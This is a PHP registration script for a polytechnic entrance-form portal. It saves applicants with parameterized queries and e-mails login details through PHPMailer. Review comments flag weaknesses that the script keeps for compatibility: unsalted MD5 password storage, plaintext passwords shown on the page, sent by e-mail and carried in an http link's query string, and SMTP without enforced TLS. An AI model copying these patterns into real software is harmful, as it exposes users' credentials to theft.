<?php
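ob_start();
require_once('../connect.php');
$db=db_connect();

// Read only the form fields this script uses. extract($_POST) allowed any POST
// key to create or overwrite any variable in scope (including $db), so the
// request body controlled the script's internal state.
// Missing or non-scalar fields become null, which is what the undefined
// variables evaluated to before.
$readField = static function ($name) {
    $value = $_POST[$name] ?? null;
    return is_scalar($value) ? (string) $value : null;
};
$formTypea   = $readField('formTypea');
$phoneNumber = $readField('phoneNumber');
$pass1       = $readField('pass1');
$pass2       = $readField('pass2');
$surName     = $readField('surName');
$otherNames  = $readField('otherNames');
$eMail       = $readField('eMail');
$dept        = $readField('dept');

if ($formTypea=='utmeFormn'){
    die("An Error Occured");
}

// Everything after the first seven characters of the phone number; later
// checks require this tail to be exactly four characters long.
$trans=substr((string) $phoneNumber,7);

// Duplicate-registration lookup. The values are bound as parameters rather
// than concatenated into the SQL text, so request data cannot alter the query.
$sql=$db->prepare("select * from ace_entrancetable where gsm=? and formType=?");
$sql->execute([(string) $phoneNumber, (string) $formTypea]);
$sql_fetch=$sql->fetch(PDO::FETCH_BOTH);
$num_phone=$sql->rowCount();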
if ($num_phone>0){
    header('location:createAccount.php?id=5');
}elseif ($pass1<>$pass2) {
    header('location:createAccount.php?id=1');
}elseif (strlen($trans)<>4) {
    header('location:createAccount.php?id=3');
    //  echo count($trans);
}elseif ($dept==0) {
    header('location:createAccount.php?id=4');
}else {
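    // The transaction ID is the applicant's login name: six random digits
    // followed by $trans (the phone-number tail checked above to be four
    // characters). random_int() uses the operating system's CSPRNG, so issued
    // IDs cannot be predicted from earlier ones the way mt_rand() output can.
    $transID = random_int(100000, 999999) . $trans;

    // NOTE(review): unsalted MD5 is not a password hash. It is left in place
    // because login_process.php (not visible here) presumably compares against
    // this value; migrate both sides to password_hash()/password_verify().
    $pass2 = md5($pass1);

    // The INSERT is parameterized, so the names are bound as-is. Doubling the
    // single quotes first (as was done before) stored "O''Brien" for "O'Brien".
    $sql_query = "INSERT INTO ace_entrancetable (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`,`formType`,`dept`,`formNo`) VALUES (?,?,?,?,?,?,?,?,?,?,?)";
    $insert = $db->prepare($sql_query);

    // execute() is what reports success. The statement object is truthy even
    // when the INSERT fails, so testing it alone always announced success.
    $inserted = $insert !== false
        && $insert->execute([NULL, $surName, $otherNames, $pass2, $phoneNumber, $eMail, $dept, $transID, $formTypea, $dept, '']);

    // $sql_a keeps its role as the success flag tested later in the script.
    $sql_a = $inserted ? $insert : false;

    $deptName = '';
    if ($sql_a) {
        // Escape every request-derived value before it is echoed into the page.
        $esc = static function ($value) {
            return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        };

        // Department label for the confirmation; the id is bound, not interpolated.
        $sql_dept = $db->prepare("select * from dept where sn=?");
        $sql_dept->execute([$dept]);
        $sql_fetch_dept = $sql_dept->fetch(PDO::FETCH_BOTH);
        $deptName = $sql_fetch_dept ? $sql_fetch_dept['dOption'] : '';

        $message = "<img src='../images/ace_logoOriginal_color.png'><h2><br>Your Account Created Successfully</h2>";
        $message .= "<br><b>Name:</b> " . $esc(strtoupper($surName)) . " " . $esc($otherNames);
        $message .= " <br><b>Transaction ID:</b> " . $esc($transID);
        $message .= " <br><b>Password:</b> " . $esc($pass1);
        $message .= " <br><b>Date:</b> " . DATE("d-m-y H:i:s");
        $message .= "<br><b>Department:</b> " . $esc($deptName);

        // NOTE(review): the link carries the plain-text password in the query
        // string, where it is recorded in server logs, browser history and
        // Referer headers. Kept for compatibility with login_process.php;
        // replace with a POST form or a one-time token.
        $message .= "<a href=\"login_process.php?user=" . urlencode($transID) . "&amp;pass=" . urlencode((string) $pass1) . "\"><p>Click Here to Proceed</a>";
        $message = str_replace("\n.", "\n..", $message);
    } else {
        // Nothing was stored: do not show credentials for an account that does not exist.
        $message = "An Error Occured";
    }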
// support functions
    // Load the PHPMailer copy bundled one directory above this script
    // (main class, SMTP transport and its exception type).
    require('../PHPMailer/src/PHPMailer.php');
    require('../PHPMailer/src/SMTP.php');
    require('../PHPMailer/src/Exception.php');

    // Single mailer instance for this request; SMTPSendMail() reaches it
    // through `global $mail` rather than receiving it as an argument.
    $mail = new PHPMailer\PHPMailer\PHPMailer();
//
//

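    /**
     * Build the account-creation e-mail and hand it to SMTPSendMail().
     *
     * Every caller-supplied value is HTML-escaped before it is placed in the
     * body and URL-encoded inside the login link, so a name or password that
     * contains markup or URL metacharacters cannot change the message structure.
     *
     * @param string $email    Recipient address.
     * @param string $username Transaction ID used as the login name.
     * @param string $pwd      Password as typed by the applicant (plain text).
     * @param string $names    Display name used in the greeting.
     * @param string $deptName Course/department label.
     * @return string The value returned by SMTPSendMail().
     */
    function SendSMTPLoginMail($email, $username, $pwd,$names,$deptName)
    {
        $esc = static function ($value) {
            return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        };

        // NOTE(review): the password is mailed in clear text and repeated in
        // the query string of a plain-http link, so it ends up in mailboxes,
        // proxy and web-server logs and browser history. Replace with a
        // one-time, expiring activation token served over HTTPS.
        $mailmsg = "<img src='http://federalpolyede.edu.ng/images/ace_logoOriginal_color.png'><h2><br>Your Account Created Successfully</h2>";
        $mailmsg .= "<strong><u>ACCOUNT CREATION DETAILS</u></strong><BR>";
        $mailmsg .= "<p>Dear " . $esc($names) . ",</p><br>Please find below the access credential to ICT Portal.<br>";
        $mailmsg .= "<p>Transaction ID: " . $esc($username) . "<br>";
        $mailmsg .= "<br>Password: " . $esc($pwd);
        $mailmsg .= "<br>Course : " . $esc($deptName);
        $mailmsg .= "<a href=\"http://federalpolyede.edu.ng/ace_entranceForm/login_process.php?user=" . urlencode((string) $username) . "&amp;pass=" . urlencode((string) $pwd) . "\"><p>Click Here to Proceed</a>";
        $mailmsg .= "<br><br>Thanks you.";
        // Dot-stuffing for lines that begin with "." (legacy SMTP precaution).
        $mailmsg = str_replace("\n.", "\n..", $mailmsg);

        return SMTPSendMail($email, $mailmsg);
    }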

//

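    /**
     * Send an HTML message to one recipient through the shared PHPMailer instance.
     *
     * @param string $email   Recipient address.
     * @param string $mailmsg HTML body of the message.
     * @return string "OK" on success, otherwise "Mailer Error: " followed by the reason.
     */
    function SMTPSendMail($email, $mailmsg)
    {
        // SMTP credentials are read from the environment instead of being
        // written into this file. A password stored in source is readable by
        // anyone who can read the file (backups, repository copies, a
        // misconfigured web server), so the previously embedded one must be
        // treated as compromised and rotated.
        // SMTP_USERNAME / SMTP_PASSWORD are suggested names; align them with
        // the deployment's configuration.
        $smtpUser = getenv('SMTP_USERNAME');
        $smtpPass = getenv('SMTP_PASSWORD');
        if ($smtpUser === false || $smtpUser === '' || $smtpPass === false || $smtpPass === '') {
            return 'Mailer Error: SMTP credentials are not configured';
        }

        // PHPMailer object created by the including script.
        global $mail;

        $mail->isSMTP();
        $mail->Host = 'mail.federalpolyede.edu.ng';
        // NOTE(review): port 25 with no SMTPSecure setting leaves transport
        // encryption to whatever the server offers. Confirm the server supports
        // STARTTLS and require it (typically on the submission port) so the
        // credentials and message body are never sent in clear.
        $mail->Port = 25;
        $mail->SMTPAuth = true;
        $mail->isHTML(true);
        $mail->Username = $smtpUser;
        $mail->Password = $smtpPass;
        // Sender address literal is reproduced as it appears in this copy of the file.
        $mail->setFrom('[email protected]', 'ICT Tech Support');
        $mail->addAddress($email, 'User Feedback');
        $mail->Subject = 'Federal Poly Account Information';
        // msgHTML() sets the HTML body and derives a plain-text alternative from it.
        $mail->msgHTML($mailmsg);

        if (!$mail->send()) {
            return 'Mailer Error: ' . $mail->ErrorInfo;
        }

        return "OK";
    }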

//
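    if ($sql_a) {
        $email = $eMail;
        $names = strtoupper($surName) . " " . $otherNames;

        // SendSMTPLoginMail() returns "OK" or a "Mailer Error: ..." string.
        // The result used to be discarded, so a failed delivery left no trace;
        // record it server-side (never the password) for follow-up.
        $mailStatus = SendSMTPLoginMail($email, $transID, $pass1, $names, $deptName);
        if ($mailStatus !== "OK") {
            error_log('sampleMail: account e-mail not sent for transID ' . $transID . ': ' . $mailStatus);
        }
    }

    // On-screen confirmation assembled earlier in this branch.
    echo $message;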
}
// Send the buffered output started by ob_start() at the top of the script.
ob_end_flush();
?>
<div style="color: #FF0000;"><h1>Write Down Your Details Before You Proceed</h1></div>
<form>

    <input type="button"  value="Click to Print" onclick="print()" >
</form>

